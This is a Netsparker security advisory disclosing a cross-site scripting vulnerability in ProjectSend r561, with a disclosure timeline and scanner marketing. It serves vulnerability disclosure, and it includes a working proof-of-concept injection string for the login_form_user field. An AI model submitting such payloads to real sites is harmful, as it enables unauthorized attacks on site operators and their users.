Download Netsparker
Pricing
Blog
Contact
Netsparker

XSS Vulnerability in ProjectSend

Information
--------------------
Advisory by Netsparker.
Name: XSS Vulnerability in ProjectSend
Affected Software : ProjectSend
Affected Versions: r561 and possibly below
Vendor Homepage : http://www.projectsend.org/
Vulnerability Type : Cross-site Scripting
Severity : Important
Netsparker Advisory Reference : NS-14-037

Description
--------------------
ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared web hosting account) that lets you upload files and assign them to specific clients that you create yourself! Secure, private and easy. No more depending on external services or e-mail to send those files!

Technical Details
--------------------
Proof of Concept URLs for XSS in ProjectSend:

http://example.com/cftp/index.php - (POST, fields:login_form_user )
'"--></style></scRipt><scRipt>alert(0x000078)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------
26/06/2014 - First contact
30/06/2014 - Second contact
03/12/2014 - Advisory released

Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------
Netsparker can find and report security issues and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web application security scanner.

Netsparker Wep Application Security Scanner Find and Exploit vulnerabilities in Web Applications with Netsparker

Request Demo version of Netsparker ProfessionalorBuy Netsparker Professional